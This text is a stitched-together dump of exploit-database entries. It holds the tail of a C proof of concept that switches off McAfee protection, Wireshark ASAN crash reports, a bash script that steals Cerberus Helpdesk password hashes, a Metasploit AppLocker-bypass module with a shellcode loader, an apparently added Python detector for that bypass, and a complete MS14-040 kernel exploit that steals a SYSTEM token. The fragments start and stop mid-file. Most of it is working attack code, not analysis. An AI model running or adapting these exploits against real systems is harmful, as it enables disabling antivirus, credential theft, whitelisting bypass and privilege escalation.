printf(" *******************************************\n\n");
/*
* The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to
* disable the password protection, but you can also access to others useful
* keys.
*
* User Password
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
*
* Buffer protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
*
* Access protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
*
* On Access Scanner
* HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
*
* Others
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
*
*/
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, &reg_key) != ERROR_SUCCESS)
{
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\Wow6432Node\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, &reg_key) != ERROR_SUCCESS)
{
printf("Error opening registry key...\n");
return;
}
}
// Check current status of McAfee protection
RegQueryValueEx(reg_key,"UIPMode",NULL, &type,(BYTE *)&data,&size);
printf(" [+] Current UIPMode = %d (%s)\n\n", data, status[data]);
RegCloseKey (reg_key);
// Open McAfee magic device
p = opendevice();
printf(" [-] Please John, let me write to your registry keys...");
// Request to the scan engine to stop protect registry keys
DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0);
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &reg_key) != ERROR_SUCCESS)
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, &reg_key) != ERROR_SUCCESS)
{
printf(" hmmm hmmm something went wrong!\n\n");
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
return;
}
printf(" OK\n");
data1 = 0;
if( argc > 1 )
data1 = atoi(argv[1]);
// Disable McAfee protection
if( RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS)
printf("\n hmmm hmmm something went wrong!\n");
else
printf("\n [+] Thank you! now we got the control! UIPMode = %d\n",data1);
RegCloseKey (reg_key);
printf("\n [+] Run \"%s %d\" to get original settings\n\n",argv[0],data);
// Tell to engine to take control again
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=739
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8
READ of size 4 at 0x60400009d960 thread T0
#0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20
#1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#3 0x51e4bc in main wireshark/tshark.c:2213:13
0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)
freed by thread T0 here:
#0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9
#2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
#3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
#4 0x51e4bc in main wireshark/tshark.c:2213:13
previously allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35
#3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7
#4 0x528036 in load_cap_file wireshark/tshark.c:3499:12
#5 0x51e4bc in main wireshark/tshark.c:2213:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free
Shadow bytes around the buggy address:
0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa
0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==6853==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39529.zip
#!/bin/bash
#####################################################################################
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
# Date: 04.02.2016 #
# Exploit Author: asdizzle_ #
# Vendor Homepage: http://www.cerberusweb.com/ #
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
# Version: 5 - 6.7 #
# Tested on: Debian 8 / apache2 with cerb 5 #
#####################################################################################
# Prerequisites: #
# -At least one worker must be logged in #
# -/storage/tmp/ dir must be accessible #
# #
# If everything else fails try if there's directory listing in /storage/tmp #
# You might find attachments and even support tickets. #
#####################################################################################
url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
pre='devblocks' # If this doesn't work try 'zend'
echo "[*] Trying to fetch cache file"
cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
if [ -z "$cachechk" ];then
echo "[-] File not found."
exit
else
echo "[+] Found. Extracting..."
hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
if [ -z "$hashes" ];then
echo "[-] Hash extracting failed"
else
echo "[+] Extracting seems to have worked"
echo
echo "$hashes"
fi
fi
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Post::File
def initialize(info={})
super(update_info(info,
'Name' => 'AppLocker Execution Prevention Bypass',
'Description' => %q{
This module will generate a .NET service executable on the target and utilise
InstallUtil to run the payload bypassing the AppLocker protection.
Currently only the InstallUtil method is provided, but future methods can be
added easily.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Casey Smith', # Original AppLocker bypass research
'OJ Reeves' # MSF module
],
'Platform' => [ 'win' ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DefaultTarget' => 0,
'DisclosureDate'=> 'Aug 3 2015',
'References' =>
[
['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
]
))
register_options([
OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
'INSTALLUTIL', %w(INSTALLUTIL)])])
end
# Run Method for when run command is issued
def exploit
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
end
end
# sysinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
execute_installutil
end
end
def execute_installutil
envs = get_envs('TEMP', 'windir')
dotnet_path = get_dotnet_path(envs['windir'])
print_status("Using .NET path #{dotnet_path}")
cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
installutil_path = "#{dotnet_path}\\InstallUtil.exe"
print_status("Writing payload to #{cs_path}")
write_file(cs_path, generate_csharp_source)
register_files_for_cleanup(cs_path)
print_status("Compiling payload to #{exe_path}")
csc_path = "#{dotnet_path}\\csc.exe"
csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
print_status("Executing payload ...")
vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
register_files_for_cleanup(exe_path)
end
def get_dotnet_path(windir)
base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}"
paths = dir(base_path).select {|p| p[0] == 'v'}
dotnet_path = nil
paths.reverse.each do |p|
path = "#{base_path}\\#{p}"
if directory?(path) && file?("#{path}\\InstallUtil.exe")
dotnet_path = path
break
end
end
unless dotnet_path
fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
end
dotnet_path
end
def generate_csharp_source
sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
cs = %Q^
using System;
namespace Pop
{
public class Program { public static void Main() { } }
[System.ComponentModel.RunInstaller(true)]
public class Pop : System.Configuration.Install.Installer
{
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
private static UInt32 INFINITE = 0xFFFFFFFF;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
public override void Uninstall(System.Collections.IDictionary s)
{
byte[] sc = new byte[] {#{sc}};
IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
IntPtr id = IntPtr.Zero;
WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
}
}
}
^
cs
end
end
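Added example (not part of the Metasploit module, and not Rapid7 code): detection logic in Python for the process activity the module above produces, namely csc.exe writing an executable with /out: and InstallUtil.exe then being run with /U on that file with /logfile= and /LogToConsole=false. The events are constructed, and the field names (time, host, image, cmdline) and the 120 second correlation window are assumptions.

```python
import re
from ntpath import basename, normcase

# Constructed process-creation events (not taken from the page). The field
# names are assumptions; map them to what your EDR or Sysmon export provides.
EVENTS = [
    {"time": 100, "host": "WS01",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /target:winexe /nologo /platform:x64 /w:0 "
                r"/out:C:\Users\amy\AppData\Local\Temp\qWmZkLpA.exe "
                r"C:\Users\amy\AppData\Local\Temp\hTyUbNcd.cs"},
    {"time": 103, "host": "WS01",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmdline": r"InstallUtil.exe /logfile= /LogToConsole=false /U "
                r"C:\Users\amy\AppData\Local\Temp\qWmZkLpA.exe"},
    # Ordinary service installation: logged, target under Program Files.
    {"time": 500, "host": "BUILD02",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "cmdline": r'InstallUtil.exe /LogFile=C:\Logs\svc.log '
                r'"C:\Program Files\Acme\AcmeSvc.exe"'},
    # /U on a binary in Temp, but no preceding compile and logging left on.
    {"time": 900, "host": "WS07",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r'InstallUtil.exe /U "C:\Users\bob\AppData\Local\Temp\setup.exe"'},
]

# Directory fragments treated as user-writable (an assumption; tune per estate).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def tokenize(cmdline):
    """Split a Windows command line, keeping quoted paths in one token."""
    return [t.replace('"', "") for t in re.findall(r'(?:"[^"]*"|[^\s"])+', cmdline)]


def is_switch(arg):
    return arg.startswith(("/", "-"))


def analyse(events, window=120):
    """Return one finding per suspicious InstallUtil.exe target."""
    compiled = {}  # (host, normalised output path) -> time csc.exe produced it
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        exe = basename(ev["image"]).lower()
        args = tokenize(ev["cmdline"])[1:]
        if exe == "csc.exe":
            for arg in args:
                if arg[:5].lower() in ("/out:", "-out:"):
                    compiled[(ev["host"], normcase(arg[5:]))] = ev["time"]
            continue
        if exe != "installutil.exe":
            continue
        switches = {a[1:].lower() for a in args if is_switch(a)}
        for target in (normcase(a) for a in args if not is_switch(a)):
            reasons = []
            if switches & {"u", "uninstall"}:
                reasons.append("uninstall_switch")
            if "logfile=" in switches and "logtoconsole=false" in switches:
                reasons.append("logging_suppressed")
            if any(marker in target for marker in USER_WRITABLE):
                reasons.append("user_writable_target")
            built = compiled.get((ev["host"], target))
            if built is not None and 0 <= ev["time"] - built <= window:
                reasons.append("compiled_just_before")
            # Installs of binaries from protected locations are not reported.
            if not {"user_writable_target", "compiled_just_before"} & set(reasons):
                continue
            full_pattern = {"uninstall_switch", "logging_suppressed",
                            "user_writable_target"} <= set(reasons)
            high = "compiled_just_before" in reasons or full_pattern
            findings.append({"host": ev["host"], "time": ev["time"],
                             "target": target, "reasons": reasons,
                             "severity": "high" if high else "medium"})
    return findings


if __name__ == "__main__":
    for finding in analyse(EVENTS):
        print(finding)
```

The correlation key is the csc.exe output path, so the random 8-character file names the module generates do not matter to the rule.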
# Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
# Date: 2016-03-03
# Exploit Author: Rick Larabee
# Vendor Homepage: www.microsoft.com
# Version: Windows 7, 64 bit
# Tested on: Win7 x64
# afd.sys - 6.1.7601.17514
# ntdll.dll - 6.1.7601.17514
#
# CVE : CVE-2014-1767
# Category: Local Privilege Escalation
# References:
# http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
# http://ricklarabee.blogspot.com/
# https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/
# https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
# http://www.cvedetails.com/cve/CVE-2014-1767/
# https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/
#
# Greetz: PWN4GEPWN1E, SecurityMook
from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x40
Zerobits = c_int(0)
RegionSize = c_ulonglong(0x1000)
written = c_ulonglong(0)
FakeObjSize = 0x100
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
INVALID_HANDLE_VALUE = -1
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
HalDispatchTable = c_uint64
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p, c_ulonglong, POINTER(c_ulonglong)]
ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong]
def find_driver_base(driver=None):
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
lpImageBase = (c_ulonglong * 1024)()
lpcbNeeded = c_longlong()
Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
else:
#if process_is_wow64():
# raise RuntimeError('python running in WOW64 is not supported')
lpImageBase = (c_ulong * 1024)()
lpcbNeeded = c_long()
driver_name_size = c_long()
driver_name_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
for base_addr in lpImageBase:
driver_name = c_char_p('\x00' * driver_name_size.value)
if base_addr:
Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
if driver == None and driver_name.value.lower().find("krnl") != -1:
return (base_addr, driver_name.value)
elif driver_name.value.lower() == driver:
return (base_addr, driver_name.value)
return None
def get_haldispatchtable():
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
kernel32.LoadLibraryExA.restype = c_uint64
kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
kernel32.GetProcAddress.restype = c_uint64
(krnlbase, kernelver) = find_driver_base()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
halDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable -= hKernel
halDispatchTable += krnlbase
return halDispatchTable
def CreateBuffer1(inbuf1addr):
print "[+] Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr)
inbuf1size = 0x40
targetsize = 0x100
virtualAddress = 0x13371337
mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff)
inbuf1 = "\x41" * 0x20
inbuf1 += struct.pack("Q", virtualAddress) #0x1a
inbuf1 += struct.pack("Q", mdlsize)
inbuf1 += "\x42" * 4
inbuf1 += "\x43" * 4
inbuf1 += "\x01\x00\x00\x00"
inbuf1 += "\x00\x00\x00\x00"
inbuf1 += "\x00" * (inbuf1size - len(inbuf1))
baseadd = c_ulonglong(0x1001)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
wpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written))
def CreateBuffer2(inbuf2addr):
print "[+] Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr)
inbuf2size = 0x18
addrforbuf2 = 0x0AAAAAAA
inbuf2 = struct.pack("Q", 0x1)
inbuf2 += struct.pack("Q", addrforbuf2)
inbuf2 += "\x00" * (inbuf2size -len(inbuf2))
baseadd = c_ulonglong(inbuf2addr+1)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))
def CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory):
print "[+] Print creating fakeobject at ", hex(fakeobjectaddr)
fakeobject2addr = setinfoworkerfactory - 0x18
fakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite)
fakeobj2size = len(fakeobject2)
kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))
objhead = ("\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
fakeobject = objhead
fakeobject += struct.pack("Q", fakeobject2addr) + "\x41"*96
fakeobject += "\x42" * (FakeObjSize - len(fakeobject))
kernel32.WriteProcessMemory(-1, fakeobjectaddr, fakeobject, FakeObjSize, byref(written))
def main():
print "[+] creating socket..."
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0)
if sock == -1:
print "[-] no luck creating socket!"
sys.exit(1)
print "[+] got sock 0x%x" % sock
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(135)
addr.sin_addr = socket.htonl(0x7f000001)
connect(sock, byref(addr), sizeof(addr))
print "[+] sock connected."
print "[+] fill kernel heap"
rgnarr = []
nBottomRect = 0x02aaaaaa
while(1):
hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1)
if hrgn == 0:
break
rgnarr.append(hrgn)
print ".",
print "\n[+] GO!"
HalDispatchTable = get_haldispatchtable()
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
# Win7 - x64
(halbase, dllname) = find_driver_base("hal.dll")
OS = "7"
if OS == "7":
HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64
_KPROCESS = "\x70"
_TOKEN = "\x08\x02"
_UPID = "\x80\x01"
_APLINKS = "\x88\x01"
print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation)
IoStatus = c_ulonglong()
IoStatusBlock = c_ulonglong()
addrSetInfoWorkerFactory = 0x2218
firstWriteAddr = HalDispatchTable + 0x8 - 0x2C
secondWriteAddr = firstWriteAddr + 0x4
thirdWriteAddr = firstWriteAddr + 0x1
shellcode_address = c_ulonglong
shellcode_address = 0x0000000000002500
what_address = 0x0000250800002500
what_part1 = what_address & 0xfffffff
what_part2 = what_address >> 32 & 0xfffffff
inbuf1 = 0x1000
inbuf2 = 0x2000
hWF = c_ulonglong(0)
FakeWorkerFactoryADDR = 0x2100
CreateBuffer1(inbuf1)
CreateBuffer2(inbuf2)
CreateFakeObject(firstWriteAddr, FakeWorkerFactoryADDR, addrSetInfoWorkerFactory)
print ""
print ""
print "[*] Trigger IOCTL 0x1207f (afdTransmitFile) to setup the memory "
print "[*] structures for phase 2 and fil the freed space with a "
print "[*] WorkerFactory Object"
raw_input("[+] Press Enter to trigger phase 1")
ntdll.ZwDeviceIoControlFile.argtypes = [c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, POINTER(c_ulonglong),
c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
status = ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x1207f, inbuf1, 0x40, 0x0, 0x0)
kernel32.CreateIoCompletionPort.argtypes = [c_ulonglong,c_ulonglong,c_ulonglong,c_ulonglong]
CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, 0, 0, 0))
ntdll.ZwCreateWorkerFactory.argtypes = [POINTER(c_ulonglong), c_ulonglong, c_ulonglong, c_void_p, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,0,CompletionPort,INVALID_HANDLE_VALUE,0,0,0,0,0)
hWFaddr = hWF
padding = "\x90"*8
HalDispatchTable0x8 = HalDispatchTable + 0x8
sc_pointer = struct.pack("Q", shellcode_address+0x10)
sc_pointer += struct.pack("Q", 0x25)
restore_ptrs = "\x41\x51" +\
"\x41\x52" +\
"\x41\x53" +\
"\x49\xb9" + struct.pack("Q", HaliQuerySystemInformation) +\
"\x49\xba" + struct.pack("Q", HalDispatchTable0x8) +\
"\x4d\x89\x0a"
tokenstealing = "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00" +\
"\x4D\x8B\x89" + _KPROCESS + "\x00\x00\x00" +\
"\x4D\x89\xCA" +\
"\x4D\x8B\x89" + _APLINKS + "\x00\x00" +\
"\x49\x81\xE9" + _APLINKS + "\x00\x00" +\
"\x49\x83\xB9" + _UPID + "\x00\x00\x04" +\
"\x75\xe8" +\
"\x4D\x8B\x89" + _TOKEN + "\x00\x00" +\
"\x4D\x89\x8A" + _TOKEN + "\x00\x00"
fixobjheaders = "\x4d\x8b\x92\x00\x02\x00\x00" +\
"\x4d\x89\xd1" +\
"\x4d\x8b\x12" +\
"\x41\xbb" + struct.pack("L", hWF.value)+\
"\x41\x83\xe3\xfc" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xda" +\
"\x49\xc7\x02\x00\x00\x00\x00" +\
"\x49\x83\xc1\x58" +\
"\x4d\x89\xca" +\
"\x4d\x8b\x09" +\
"\x49\x83\xe9\x01" +\
"\x4d\x89\x0a" +\
"\x41\x5b" +\
"\x41\x5A" +\
"\x41\x59" +\
"\xc3"
shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders
shellcode_size = len(shellcode)
print "\n\n[+] Writing Shellcode at address: ", hex(shellcode_address)
kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written))
print "\n\n[*] Triggering IOCTL 0x120c3 (afdTransmitPackets) to free the"
print "[*] WorkerFactory object created above and fill the freed object"
print "[*] with a user controlled object to perform the necessary overwrites"
raw_input("[+] Press Enter to trigger phase 2")
### Trigger 2
## afd!AfdTransmitPackets
ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x120c3, inbuf2, 0x18, 0x0, 0x0)
ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False)
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part1, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", secondWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", thirdWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) ;
inp = c_long()
out = c_long()
inp = 0x1337
qip = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /K cd c:\\windows\\system32")
if __name__ == "__main__":
if platform.architecture()[0] == '64bit':
main()
else:
print "Please use a 64 bit version of python"
sys.exit()
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
